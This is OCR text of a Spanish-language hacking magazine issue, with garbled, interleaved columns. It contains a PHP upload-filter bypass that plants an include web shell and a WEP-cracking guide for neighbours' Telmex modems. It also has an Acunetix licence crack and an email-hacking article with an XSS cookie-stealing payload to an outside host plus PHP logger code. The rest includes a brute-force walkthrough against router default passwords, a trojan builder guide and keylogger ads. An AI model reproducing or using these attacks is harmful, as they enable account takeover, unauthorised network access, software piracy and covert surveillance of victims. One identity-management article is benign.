filename=”foto.jpg”\r\n Código:
Se especifica el nombre del archivo que se esta subiendo al <?php
upload: foto.jpg $archivo = $HTTP_POST_FILES[‘archivo’];
$nombre = $archivo[‘name’];
Código: $explod = explode(‘.’, $nombre);
Content-Type: image/jpeg\r\n $ext = $exploded[‘1’];

20 www.hackingmexico.mx
bypassing de uploaders
Primero con el live http headers capturamos la petición
if (!($ext != ‘jpg’)) {
que manda nuestro navegador al subir un archivo
echo’No aceptamos esa extension’;
llamado h4x0r1337.jpg:
}else{
    if (move_uploaded_file($archivo[‘tmp_name’],
Código:
$archivo[‘name’])){
-----------------------------24464570528145\r\n
       echo “Archivo subido correctamente <a href=’”.$arc
Content-Disposition: form-data; name=”archivo”;
hivo[‘name’].”’>Archivo</a>”;
filename=”h4x0r1337.jpg”\r\n
    }else{
Content-Type: image/jpeg\r\n
       echo “Imposible subir archivo”;
\r\n
  }
<? include($_GET[s]); ?>

?>
Ahora le dariamos al boton que dice repetir y
Ese es un ejemplo muy simple, ahi
modificariamos la peticion asi
bastaría con subir un archivo con
nombre h4x0r1337.jpeg.php para
Código:
bypassear. Aquí pongo otro un
-----------------------------24464570528145\r\n
poco más complicado:
Content-Disposition: form-data; name=”archivo”;
filename=”h4x0r1337.php....”\r\n
Código:
Content-Type: image/jpeg\r\n
<?php
\r\n
$archivo =
<? include($_GET[s]); ?>
$HTTP_POST_

Así
FILES[‘archivo’];
$nombre =
$archivo[‘name’];
$exten =

lo
strrchr($nombre,
‘.’);
if ($ext ==
‘php’ or $ext ==

gra
‘php5’) {
echo’No
aceptamos ese tipo de
archivos’;

ria
}else{
    if
(move_uploaded_
file($archivo[‘tmp_name’],
$archivo[‘name’])){

mos
       echo “Archivo subido
correctamente a <a href=’”.$archivo
[‘name’].”’>Archivo</a>”;
    }else{
       echo “Imposible subir archivo”;
  }
}  bypassear
?>
el
Si subirieamos un archivo con el nombre h4x0r1337.jpg.
php no dejaria ya que usa $extension = strrchr($nombre,
‘.’); y ahí nos negaria la extension. Subir un archivo
uploader
llamado h4x0r1337 php.jpg tampoco nos valdría ya que Ojala sea de utilidad este pequeño tuto de como
.jpg no se ejecutaria en el servidor.La solución esta en subir Bypassear uploaders, Por motivos de trabajo me es
un archivo llamado h4x0r1337.php.... por ejemplo así muy dificil encontrar tiempo libre para colaborar, pero
bypasseariamos el filtro y mishell.php.... podría ser leído cuando me encuentro un espacio lo hago con mucho
como php en el servidor, veamos como hacerlo: gusto, saludos.

www.hackingmexico.mx 21
HackShop
Cursos Online
Diplomados
DVDs
Revistas
Hacking
Gadgets

USB PROFESSIONAL KEYLOGGER


(2MB Ghost Edition).
Vigilancia de computadoras profesional

Completamente indetectable por TODOS los an-


tivirus, no es posible detectarlo por medio
de Software, ya que el sistema lo ve trans-
parente como si fuera un teclado normal, no
requiere software de instalacion, ni drivers,
solo conectalo y listo.
Intercepta todas las teclas presionadas en
el teclado, averiguando passwords, conversa-
ciones y mucho mas. Tiene memoria suficiente
para guardar conversaciones hasta 6 meses, 2
millones de teclas, 1000 paginas de texto.
No requiere pilas, se alimenta directamen-
te de la energia de la PC
Simplemente conectalo atras de la compu-
tadora, y conecta el teclado al keylogger, y
automaticamente empezara a grabar todas las
teclas presionadas
RASPBERRY PI PENTESTER EDITION WIFI CRACKER ROUTER
Ya puedes adquirir la Raspberry PI Pentester Edi- Este router crackea las redes WEP y WPA automati-
tion atravez de HackingMexico, con la carcaza camente, no requiere de software extra, ni de una
oficial, ademas del Sistema Operativo para Pen- computadora, solo conectalo y listo.
testing de HackingMexico basado en Debian. Las
especificaciones son las siguientes
Specifications

SoC:[7] Broadcom BCM2835 (CPU, GPU, DSP, SDRAM, and


single USB port)[3]
CPU: 700 MHz ARM1176JZF-S core (ARM11 family)[3]
GPU: Broadcom VideoCore IV,[73] OpenGL ES 2.0,
MPEG-2 and VC-1 (with license[70]), 1080p30
h.264/MPEG-4 AVC high-profile decoder and enco-
der[3]
Memory (SDRAM): 512 MB (shared with GPU) as of 15
October 2012
USB 2.0 ports:[14] 2 (via integrated USB hub)[65]
Video outputs:[7] Composite RCA (PAL and NTSC),
HDMI (rev 1.3 & 1.4),[74] raw LCD Panels via
DSI[75][76]14 HDMI resolutions from 640×350 to
1920×1200 plus various PAL and NTSC standards.[77]
Audio outputs:[7] 3.5 mm jack, HDMI
Onboard storage:[14] SD / MMC / SDIO card slot HACKINGMEXICO DVD 1
Onboard network:[7][14] 10/100 Ethernet (RJ45) via
USB hub[65]
Low-level peripherals: 8 × GPIO, UART, I²C Ya puedes adquerir el primer DVD de Hacking-
bus, SPI bus with two chip selects, +3.3 V, +5 V, Mexico que viene a tope con video tutoriales
ground[73][78] paso a paso, mas de 50 herramientas de Hacking
Power ratings: 700 mA (3.5 W) compiladas en una interfaz grafica y la revista
Power source:[7] 5 volt via MicroUSB or GPIO header en formato digital.
Size: 85.60 mm × 53.98 mm (3.370 in × 2.125 in)[80] Contiene algunas herramientas desarrolla-
Weight: 45 g (1.6 oz)[81] das por el staff de HackingMexico, otras son
Operating systems: HackingMexico OS Open Source
makuantosh

Haciendo
WarDriving
Con IPhone, M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net
Ipad, Ipod Touch
Obteniendo
S
aludos bandita una vez mas
es un placer estará aka con
ustedes , hoy veremos como Claves WEP
hacer ese tan afamado hackeo
de redes wifi y obtener las claves weps
mas rápido ke con
de los módems de Telmex en Mexico. Back Track de linux
Empezemos por definir que es
War Driving, según la Wikipedia: recomendable es el Bus_Wardriving, Hare un ejercicio con hackeando
Se llama wardriving a la búsqueda en la que aprovechando los trayectos una red pero analizando los siguientes
de redes inalámbricas Wi-Fi desde un de autobús urbano buscamos redes puntos de la infraestructura wifi:
vehículo en movimiento. Implica usar cómodamente reduciendo la emisión
un coche o camioneta y un ordenador de gases y los riesgos de conducir por • Provedoor de Servicio
equipado con Wi-Fi, como un portátil la ciudad. Esta modalidad plantea un • Fabricante y marca del modem
o una PDA, para detectar las redes. principal problema: la fuente de ali- • Direccion MAC
Esta actividad es parecida al uso de mentación está limitada a la propia • Tipo de Seguridad
un escáner para radio. batería del Portatil o PDA. • Implementada (WEP,
El wardriving recibe su nombre Hay Programas para nuestros ide- WPA,WPSK) etc.
del wardialing (popularizado en la pe- vices con los cuales podemos actual- • Canales de Acceso
lícula de Matthew Broderick Juegos mente obtener las contraseñas wep de
de guerra) porque también implica los módems y obtener acceso , expli- No falta el pendejo ke diga no mames
buscar sistemas informáticos. care brevemente el funcionamiento de , yo pa ke kiero saber eso ke pongan
Muchos practicantes usan dispo- cómo trabajan. como hacerlo , y siempre he dicho
sitivos GPS para determinar la ubica- Analizando varias apps ke he pro- algo si vas a hacer algo hazlo bien , no
ción de los hotspots hallados y regis- bado solo hay 7 ke ocupo en mi ipho- nadamas es hackear algo por hacerlo
trarla en un sitio web (el más popular ne y en mi ipad , las he probado y su , hay ke saber hacer bien las cosas .
es WiGLE). Para mejorar el rango nivel de porcentanje en el calculo de
de alcance, se construyen o compran las claves wep es de un 70% . *Las Aplicaciones estará disponibles
antenas, ya sean omnidireccionales o en la Repo de m4ku4z.net .
altamente direccionales. El software *Antes que nada Debes Hacer hecho
necesario se encuentra libremente en el jailbreak en tu idevice. (si la ban-
Internet, notablemente NetStumbler da pide un tuto para hacer el jailbreak
para Windows, KisMac para Ma- lo hare , a estas alturas debo asumir
cintosh y Kismet o SWScanner para que cualkiera de ustedes sabe ha-
GNU/Linux. cer jailbreak , ya que considero que
El uso masivo de PDA y smartpho- hay demasiados tutos en google ,
nes equipados con Wi-Fi facilitan pero si la banda lo rekiere pídanlo.
la práctica del wardriving, además
existen versiones especiales de Kis- *Este Procedimiento lo he hecho en
met y NetStumbler para la plataforma Mexico y funciona , no he probado en
Pocket PC, inclusive existe software otros países.
como WiFiFoFum que conectando un
GPS pueden crear una imagen de Ra-
dar de las redes circundantes.
Una variante muy interesante y

24 www.hackingmexico.mx
1. Primero Analizemos a ke viciti- 2. Veamos ke tipo de modem es y 3. Ahora Crackeando la clave wep

makuantosh
ma atakeremos: kien lo fabrica ^^ para “Infinitum9e8fb7” con iwep pro

Ahora tenemos la información que


necesitamos
Fabricante: Thompson Telecom
Belgium
Dirección MAC : 00:24:17:88:B0:91
Canal: 1 (trabajando sobre el canal 1
de envió recepción)
Seguridad WIFI: WEP (en este caso
es apta para su hackeo)

*Como pueden ver la Victima SSID Como Podemos ver al hacer ahora el
es un Modem Infinitum de Telmex scaneo con las herramienta iwep pro
con 6 digitos. (siempre contar vemos incluso otra infinitum de 4 di-
lo dígitos depues de la palabra gitos pero por ahora nos concentrare-
“INFINITUMXXXXXX) mos en hackear la de 6 digitos.
Para esto la aplicación trabaja con
diccionarios ke intentan decifrar la
clave a base de fuerza bruta y poder
adivinar la correcta.
Tambien podemos apreciar ke la
aplicación nos ofrece una conccion
manual (por si ya tenemos la clave
pero nos da la opción de explotar la
vulnerabilidad del modem .

www.hackingmexico.mx 25
makuantosh

4. Procedemos a explotar al vulne- 5. Obteniendo la Clave 6. Conectandonos al Modem


rabilida del sistema.

Como se puede ver tenemos 3 Claves


ke son candidatas a entrar y como
siempre a probar (como ya lo he he-
cho la clave exacta de ese modem es
Como podemos ver tengo diccionarios la segunda opción).
instalados ke contienen las claves a tes-
tear para lograr una conexión exitosa.
En total son 5 diccionarios hasta el
año 2010 con claves , las cuales de-
ben estar debidamente instaladas en el
dispositivo .

Como vemos hemos terminado ha-


ckeando la clave WEP de ese mode
ahora nos resta disfrutar de su cone-
xión y si gustan navegar con ella.

26 www.hackingmexico.mx
Reglas para usar esta otra

makuantosh
Aplicación llamada

¿Pero m4ku4z dijo


“SPEEDSSID” - Solo hackea claves weps con 6 digitos -
ke usaba 3 aplicaciones - Requiere conexión 3g/wifi para solicitar la clave -
no?, ahuevo falta una
esta es una mas sencilla Sacando la clave wep del ssid “infinitum9e8fb7” con “speedssid”
la cual nos da la clave
debido a que se conecta
a un servidor remoto y
la solicita .

Como podemos ver hemos obtenido la Y bajen las apps , son de paga pfffffffffffff,
clave , la cual es la segunda mostrada en pero en mi repo están crakeadas y son
la aplicación y listo. gratis ;) asi ke a disfrutar kuleros!!!!

¿Dónde consigo las aplicaciones con las ke Bueno amigos por mi parte ha sido todo
el m4ku4z hackeo la wifi de su vecino? sin antes agradecer su atención durante el
Facil y sencillo valedores , una vez ke tuto , espero le haya servido y utilizen al
tengan hecho el jailbreak agregen mi máximo su idevice y le saken el provecho

SOY
repo bajo la siguiente dirección: y recuerden:

http://repo.m4ku4z.net/cydia
“YO
EL M4KU4Z
Y USTEDES
NO …

www.hackingmexico.mx 27
crackeando acunetix

CRACKEANDO

ACUNET
Parte 1 de 3 / REVERSING / NIVEL: MEDIO-AVANZADO
Este tutorial es únicamente con fines educativos y no me hago
responsable por lo que se haga con su contenido.
Por Alejandro Torres (torrescrack)
e-mail: tora_248@hotmail.com
http://www.facebook.com/yo.torrescrack
www.torrescrack.blogspot.com

E
ste tutorial lo hice ya que no existe algún tute en la red nen solo una versión free que no escanea completamente como
de como atacar este software, y además de esto, resulta debería y la otra versión completa tiene un costo, en la red hay
que yo estaba buscando por la web algún escaneador un crack o parche pero no me anime a bajarlo, asi que me puse
de vulnerabilidades web reciente y bueno, leí en mu- a darle un vistazo para obtener mi propia versión liberada y
chos sitios que este software acunetix es uno de los mejores demostrar que este software especializado en buscar vulnerabi-
pero el problema es que yo quería probarlo y en la pagina tie- lidades web es muy vulnerable.

28 www.hackingmexico.mx
TIX

crackeando acunetix
V8–2012
EXPLORANDO AL ENEMIGO Uhmm vemos que antes de iniciar el soft me pide datos
Primero Instalamos y se me ocurrió correr el software para de la licencia para activar online y si no ingresas nada o algo
ver que tipo de protección o limitación utilizaba , veamos. erróneo no entras al soft , aparte de caro $$ ni siquiera te dejan
probar el software por unos días en su ver-
sión completa, vayamos a la carpeta donde
se instalo el software para ver que mas tiene.

Bien no tiene muchas cosas, pero hay se encuentra un


ejecutable llamado “Activation.exe” que al correrlo nos da-
mos cuenta que es la misma pantalla que vimos anterior-
mente y el ejecutable principal es “wvs.exe”.

Bien, entonces ya sabemos que el programa


principal es “wvs.exe” entonces empezamos
por hay, ya que de alguna forma el programa
compara si esta registrado o licenciado y de
lo contrario carga el otro ejecutable para
iniciar con el registro o activación.

www.hackingmexico.mx 29
crackeando acunetix

Vamos a examinarlo con un escaneador


en este caso el “Protection ID” para sa-
ber si el programa esta empacado y ver en
que esta compilado, veamos.

Bien no usa algún tipo de packer/protector, solo detecto un


posible detección de CD KEY o serial check, que en este
caso es lo segundo.

ABRAMOS NUESTRO DEBUGGER Y EMPECEMOS.

Al iniciar lo primero que se me ocurrió con la info obtenida


anteriormente fue buscar en las strings el nombre del proce-
so que ejecuta, en este caso “Activation.exe” veamos lo que
encontramos.

Como veemos el software usa algún método antidebug que


detecta si esta siendo debugeado o si hay algún parche, to-
davía no sabemos como lo hace pero sigamos buscando mas Seguimos buscando y aquí tenemos algo interesante si ven
strings haber si hay otras llamadas y al rato regresamos en la imagen tenemos la zona mas sospechosa de todas pues
caso de ser necesario, colocamos en el inicio de esa rutina un aquí vemos cuando decide si expira o no si esta activado o
BreakPoint con (f2) y sigamos.. no, vayamos a esa zona haber que vemos.

30 www.hackingmexico.mx
Que bien!!, si ven tenemos una

crackeando acunetix
dirección de memoria que dentro de
ella se encuentra un buffer y compa-
ra el contenido de esa direccion con 0
y si el valor es diferente ya no llama al
“activation.exe” supongo que al haber li-
cencia debe valer 1 el contenido del buffer.
En mi experiencia en diferentes software co-
merciales he visto este problema que utilizan
comparaciones en diferentes partes o ubicaciones
del programa hacia la misma dirección de memoria
para ver si el soft esta registrado, ellos piensan que es
un método anti-cracking por si alguien se le ocurre par-
chear únicamente ese salto condicional, tambien en algún
momento debe meterle contenido a ese buffer, veamos si mis
sospechas son ciertas busquemos si alguien mas usa esa dirección
de memoria, hagamos click derecho y “find references to: address
constant”, veamos.

Como les decia mis sospechas eran cier- de la licencia, pongamos un Break Point
tas pues el software utiliza esa direccion en todos ellos y ahora si ejecutemos el
de memoria en muchisimos otros luga- Olly debugger y veamos en donde para-
res, posiblemente para hacer chequeos ra, veamos.

www.hackingmexico.mx 31
crackeando acunetix

Ok como vemos que hace unas compa-


raciones y de hay verifica si tu version
es valida para correr varias instacias en
el mismo pc , creo que la version mas
completa te permite hasta 10 instancias
corriendo, bien sigamos viendo donde
mas detiene la ejecucion y ver que otras
comparaciones hace.

Vemos que paro donde saca de la direc-


ción de memoria 0xAE3E38, un buffer
y compara el contenido de ese buffer+4
si es igual a 0 y de caso contrario ya no
ejecuta la ventana “activation”.

Ahora bien ya tenemos el dato que en


esa dirección de memoria debe valer a
1, cambiémosle el byte a 1.

Sigamos la ejecución del software y


veamos en donde mas ocupa esa di-
rección de memoria, sigamos...

Vemos que compara el mismo buffer


+ 48 si es igual a 0 y de ser correc-
to esquiva el mensaje que nos diria
cuando caduca la licencia, en este
caso el buffer+48 vale 0 asi que no
nos preocupamos pero hay que tener-
lo en cuenta, seguimos la ejecucion
haber que otra sorpresa nos tiene el
software.

En el próximo numero continuaremos


con este tutorial…

32 www.hackingmexico.mx
hackeando correos

T
al vez la primera inquietud de muchos al iniciar-
se en el mundo del hacking, es “Puedo hackear el
Hac
C
email de mi novia?” La respuesta simple es SI,
pero sigue leyendo, no te emociones tanto.
Por M.C Raul
Lo primero que debes entender es: Robles Aviles
• No todos los correos se pueden hackear Megabyte
• No es un proceso rapido que lleve 2 clicks
Site Scripting), pero este tipo de bugs aparecen una vez cada
Los metodos que voy a describir, son los unicos que fun- año bisiesto, y duran muy pocas horas activos.
cionan, en la red podras encontrar algunos falsos que solo
tratan de robar tu información. La forma de explotarlo seria encontrar donde se pueda in-
yectar codigo en la pagina del correo, por ejemplo
XSS
http://facebook.com/app.php?”><script language=
Un verdadero “hackeo” de cuentas de Hotmail, Gmail, etc “JavaScript”>document.location=”http://tupagina.com/
significaria un error en la programación de estas platafor- cookie.php?cookie=” + document.cookie;document.
mas, el mas famoso y facil de explotar seria un XSS (Cross location=”http://tupagina.com”</script>

CODIGO DE COOKIE.PHP:
<?php
function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’],
“unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();

$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);

if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))


fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF:
$referer | DATE{ : } $date | COOKIE: $cookie <br>”);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF:
$referer | DATE: $date | COOKIE: $cookie \n\n”);
fclose($log);
}
logData();
?>

34 www.hackingmexico.mx
keando
o
hackeando correos
orreos
mito
realidad
Una vez armado esto, hace que la victima abra tu pagina
donde este un iframe con el codigo que roba la cookie, una
FUERZA BRUTA
Hoy en dia es casi imposible realizar estos ataques debido a que
vez teniendo la cookie, puedes utilizar plugins de Firefox el sistema te banea después de ciertos intentos, pero consiste
para editar la cookie y loguearte a la cuenta de la victima. en utilizar un diccionario de palabras o de passwords comunes
para intentar entrar a la cuenta. Es un metodo lento, y tedioso,
INGENIERIA SOCIAL puedes llevarte semanas y jamas dar con el password.
Este es el metodo mas comun y sencillo, consiste en enviarle
a la victima una pagina falsa que le pida su contraseña, por KEYLOGGERS
ejemplo una postal de un admirador secreto, que al hacer Esto requiere que le instales un software de keylogger a la vic-
click pida usuario y contraseña para poder verla. La efecti- tima, necesitarias enviarle un archivo y que ellos lo ejecuten,
vidad depende de que tanta experiencia tenga la victima con tambien existen keyloggers de hardware donde se conecta el
este tipo de ataques. teclado a este dispositivo que guarda todas las teclas, pero para
esto necesitas acceso fisico a la computadora de la victima

0DAYS
Estos son mas raros de encontrar, como en Gmail que permitia
resetear el password de cualquier usuario mediante la inyeccion
de un carácter de salto de linea, salvo que tu descubras un bug
de estos, o estes en el momento justo, y en el lugar indicado, es
posible que jamas veas activo un error de esta magnitud. Estos
son los mas efectivos ya que si permiten un hackeo casi instan-
taneo, pero son difíciles de conseguir.

De ahí en fuera cualquier otro metodo que veas en la red, es


seguramente un scam, no existe mayor ciencia, ni programas
magicos que hackean cuentas, por lo regular son troyanos y
malware. Antes de ir por tanto lio, preguntante si realmente
vale la pena pasar por todo eso, si tienes dudas de tu novia,
mejor cortala y ya. Recuerda que el busca encuentra.

www.hackingmexico.mx 35
identity and access management

Identity
andAccess
Management
SIMPLIFICA Y ASEGURA ADMINISTRACIÓN
Identity and Access Management DE ACCESOS
(IAM) certifica que las personas den- En un IAM el acceso a las aplicacio-
tro de una organización tengan los nes puede estar definido por políticas
permisos y servicios que deban de de negocio, políticas de seguridad y
tener, no más y no menos, para ejer- requerimientos del usuario.
cer su labor, los cuales, la mayoría de
las veces, se encuentran distribuidos Debemos crear un mapeo en el cual
y hasta cierto punto duplicados entre asociemos grupos de usuarios con con-
las aplicaciones de una organización troles de acceso, esto lo podemos lograr
utiliza. Imaginen cuántas brechas de construyendo roles y flujos de procesos
seguridad se pueden encontrar en un que se adecuen a las necesidades del
modelo de este estilo. grupo de usuario que estamos clasifi-
cando. Posteriormente se mapean los
A partir de aquí estaremos constru-
La solución es utilizar esa misma in- privilegios a los roles, se asignan roles
yendo un modelo en base al single
formación sobre los usuarios en todas a los flujos y se asignan identidades a
sign-on, esto quiere decir que para
las aplicaciones. IAM unifica estas los roles. Esta parte es la más talachuda,
entrar a cualquier aplicación sola-
identidades para manejarse de mane- pero una vez que tengamos esto todo lo
mente se requiere un id de usuario,
ra centralizada y así poder aplicar las demás será pan comido.
y la forma de autenticar, o sea, com-
políticas y procedimientos desde un
probar que es quién dice ser, deberá
punto. Esto simplifica la construcción ADMINISTRACIÓN
de ser compleja.
de solamente un punto de referencia DE IDENTIDADES
que funcione para todas las aplicacio- Se requiere un mapeo de roles y reglas
nes y asegura las identidades de los a usuarios específicos que permitan el
usuarios consolidando la infraestruc- acceso apropiado a los servicios. A su
tura de muchos a uno y reduciendo vez, se requiere crear un proceso que
las brechas de seguridad de un estado administre y lleve registro de accesos
abrumador a manejable. a sistemas y datos, este proceso se
debe encargar del aprovisionamiento
CONSTRUYENDO UN IAM de servicios a los usuarios definidos
El primer paso para construir un IAM por el rol que les corresponda; tam-
es identificar el flujo de datos en una or- bién se debe de establecer un flujo de
ganización sobre los usuarios y decidir trabajo el cual define cómo se hará
qué datos son relevantes de las entida- este aprovisionamiento y por último
des fuente (Recursos Humanos, Control debe de considerarse que estos proce-
Escolar, etc.), consolidar y actualizar la sos puedan ser auditables.
información de todas las identidades en
una sola identidad para todos los usua-
rios de una organización.

36 www.hackingmexico.mx
identity and access management
Ayudando a la organización
Por
Annika Pringles
@annikapringles

FUNCIONAMIENTO FRAMEWORK DE UN IDENTI- Las ventajas y beneficios de un proce-


DE UN IAM TY MANAGEMENT so de ingeniería de roles son:
Para el funcionamiento de un IAM Para definir el framework de un IAM • Descubre cuentas, privilegios y
utilizaré un ejemplo para mostrar debemos de considerar 4 partes: roles huérfanos.
las partes que no pueden faltar en su • Une roles traslapados.
construcción: El repositorio de servicios de directorio • Rompe los roles que están
es el componente más crítico y es el definidos abiertamente: ¿múltiples
1. El usuario se conecta a un ser- principal sistema en donde se almacena trabajos realizados por la misma
vidor Web. toda la información del id de usuario y organización?
2. El servidor Web tiene un co- la información del perfil asignado. • Define las limitaciones de un rol
nector o “agente” que es prác- que vienen de limitaciones de
ticamente una interfaz hacia el El aprovisionamiento proporciona un en- permisos.
administrador de accesos, este foque basado en roles para la administra- • Crea herencia de roles: roles hijos
puede utilizar un plug-in o APIs ción del ciclo de vida de un usuario. con bases comunes.
para su conexión. • Limpia y coordina las definiciones
3. El administrador de accesos es La autenticación apalanca los siste- de grupos y privilegios.
un Punto de Aplicación de Polí- mas existentes incluyendo Active Di- • Esencial para una administración de
tica por lo cual se debe contem- rectory, Enterprise Single Sign-On y privilegios que ya está en marcha.
plar que sea un sistema de alto tokens RSA. • Ayuda a la documentación y
volumen y alta disponibilidad cumple con las políticas.
ya que estará tomando decisio- La administración de accesos apalan-
nes para las solicitudes de acce- ca la infraestructura de administrado-
so del servidor Web. res de accesos existentes.
4. El administrador de identidades
es un Punto de Administración RBAC
de Política que administra cen- Una vez que llegamos a este punto po-
tralizadamente toda la informa- demos empezar a utilizar un modelo
ción de las identidades desde que se llama RBAC (Role Based Ac-
varias fuentes y es capaz de de- cess Control), el cual nos permite ge-
finir procesos y flujos que man- nerar cubos de información sobre los
tengan, administren y auditen roles que estarán haciendo utilizados
el acceso a los recursos. para los accesos en las aplicaciones.
Utilizar RBAC soluciona el problema
de administración de privilegios mejor
que DAC o MAC, pero el desarrollo de
herencia de roles es realizada manual-
mente y hay pocas herramientas que
nos pueden ayudar a realizarlo.

www.hackingmexico.mx 37
cisco/juniper

CISC
E
l sistema operativo de
Microsoft (Windows)
por ser el mas usado
es objeto de constantes
ataques, al igual los sistemas
operativos de equipos de
Redes mas usados como son
CISCO y JUNIPER, también
están siendo objeto de testeo

JUNI
para su vulneración. Y como
tal estos también cuentan con
sus actualizaciones y/o parches
para corregir sus problemas de
seguridad.

Algunos ejemplos de seguridad


en equipos y/o software que
ofrecen las empresas CISCO y
JUNIPER son:

Equipos JUNIPER:

Como observamos en la tabla de arri- Estos equipos son muy buenos


ba, los dos ofrecen muchas posibili- realmente, el problema la mayoría de
dades de seguridad informática, no las veces esta en el admin de la red,
podemos abarcar todos en este artícu- ya que regularmente siempre se dejan
lo así que nos enfocaremos en uno de con algunos puertos abiertos algunos
ellos. Hablaremos un poco de los IDP de ellos el admin los desconoce y
(Intrusion Detection Prevention) y los otros se deben de dejar abiertos para
IPS (Intrusion Prevention System). la administración del equipo remota-

Equipos CISCO:

38 www.hackingmexico.mx
CO/

cisco/juniper
IPER
mente, he aquí el problema, se dejan
comúnmente abiertos los puertos 80,
443 y 22 que son respectivamente
http, https y SSH.
seguridad donde dejan las contraseñas
por default, se imaginan como cuales:
admin, root, 654321, qwerty y si tie-
nes conocimientos previos a estos
Por
Ing. Manuel Dublan aka.
t3zc4

si acaso no es suficiente con esto, he


encontrado algunas casos en los que
únicamente el user pass es el nombre
de la empresa con el típico vocales a
Pero si ya es un poco arriesgado equipos encontraras el típico admin, números y algunas letras en Mayúscu-
dejar puertos abiertos, imagínense netscreen, cisco. He aquí el problema las, ejemplo: T3lc3l, b4nc0, etc.
que para el colmo como me ha tocado no hace falta ser un hacker experto
ver y administrar varios equipos de para descifrar el admin y el pass, pero

www.hackingmexico.mx 39
cisco/juniper

A Continuación se mostrara
en un ejemplo de ataque de

Bru
for
diccionario para tener acceso
al equipo, ocuparemos BT 5
con sus tools xhydra (ataque de
diccionario o también conocido
como Brute force) y zenmap
(Escaneo de puertos), teniendo en
cuenta algunos aspectos descritos
anteriormente.

1
Lo primero es conocer la IP de
nuestra victima en este caso del
equipo y realizar un escaneo de
puertos, este se puede realizar con
nmap o zenmap.

2
Obtenidos que puertos se encuentran
abiertos creamos dos archivos de
texto sobre el escritorio de BT. Un
archivo es para el user y el otro para
los passwords.

40 www.hackingmexico.mx
ute

cisco/juniper
3
Abrimos uno de esos archivos para editarlo e
ingresamos en este caso todos aquellos posibles
passwords que creemos darán resultado.

Abrimos la tool xhydra de modo grafico solo


hay que abrir una Shell o terminal, tecleamos xhydra

rce
automáticamente se abrirá la tool, en la pestaña target
indicaremos la IP del equipo y el puerto por donde queremos
intentar descifrar el user pass.

4
En la pestaña Passwords podemos indicarle que intente

5
con un solo user y pass o utilizar los archivos de texto que
creamos en el escritorio de BT como se ve en la imagen, así Por ultimo en la solapa Start le diremos que
intentara con la lista que hayamos ingresado. de comienzo al ataque, si los archivos de texto
o diccionarios son muy grandes y el user pass
muy complejos tardara mucho pero si son por
default o no muy complejos no tardara mucho
en encontrarlos y nos dira valid password found.

www.hackingmexico.mx 41
nxt controler

NxtControler
Un troyano
Paradivertirse Por
Fernando I. Nequis

N
xt Controler es un virus de Cuando cree esta aplicación, la cree tro servidor Ftp Y darle clic en Try, en
tipo Troyano que recibe para que todo newbie pueda empezar la barra inferior de status nos aparecerá
comandos de un emisor re- a manipular computadores remotos, así Try Succesful si es que esta correcto,
moto vía Ftp, los cuales al que cree un panel de Creación Llamado si no aparece esto debemos checar que
recibirse ejecutan una acción predeter- “NXT CONTROL MAKER”, el cual todo esté bien escrito, después pasamos
minada, La lista de comandos consta de te permite personalizar tu propio Nxt- a la parte derecha donde se encuentra un
comandos básicos y divertidos, Cada controler para que lo puedas utilizar y cuadro de texto, en este cuadro de texto
comando esta en corchetes, hasta ahora controlar otras pc. En este Articulo te debemos poner donde queremos que se
la lista es algo corta pero seguiremos ac- enseñare a como personalizar tu NXT- creen los archivos, en la parte inferior
tualizando, ahora mismo trabajamos en Controler. La aplicación de Creación la esta una lista de los archivos que quere-
la manipulación de archivos. puedes encontrar en mi pagina web: mos crear, en la cual se encuentran:
• Command List: Crea un archivo
• [END]-Termina la aplicación http://nxthacks.webs.com/nxt- de texto con la lista de todos los
Remota control comandos y sus usos.
• [SHUTDOWN]-Apaga el • Portable Exe: Es el virus Recep-
computador http://www.hackingmexico.mx/ tor Portable.
• [RESTART]-Reinicia el nxthacks • Instaler Exe: Es el virus Recep-
computador tor instalable, solo lo debes eje-
• [LOG-OFF]-Cierra sesión http://neqprojects.webs.com/ cutar y automáticamente se copia
• [PSY]-Abre el video en youtube nxtcontrol.htm en inicio para que inicie cada que
de Oppa Gangnam style se prende el ordenador, se copia
• [CD-OPEN]-Abre la bandeja de Esta es una aplicación portable, y es con el nombre de “Conexiones de
CD´s fácil de usar: (Figura 1) Red” por seguridad.
• [CD-CLSE]-Cierra La bandeja • Remote Controler: Es el progra-
de CD´s Para crear nuestro NXT-Controler ne- ma emisor de Comandos.
• [CLEAR]-Limpia la ventana de cesitamos un servidor FTP dedicado, yo • Test Exe: Es el virus receptor,
comandos recomiendo usar la compañía 000we- pero este no se esconde y es por-
• [MNTOR-OFF]-Apaga el bhost.com porque es gratis y fácil, de- table lo cual te permite ver su co-
monitor bemos ingresar la información de nues- rrecto funcionamiento.
• [HD-TSKBR]-Esconde la barra
de tareas
• [SW-TSKBR]-Muestra la barra
de tareas
• [BGRND-1]- Cambia el Fondo
por latin lover
• [BGRND-2]-Cambia el fondo
Por una chica sexy
• [Kill[Proceso]-Termina el
proceso escrito
• [MSG[Mensaje]-Manda un
Messagebox con el mensaje
escrito
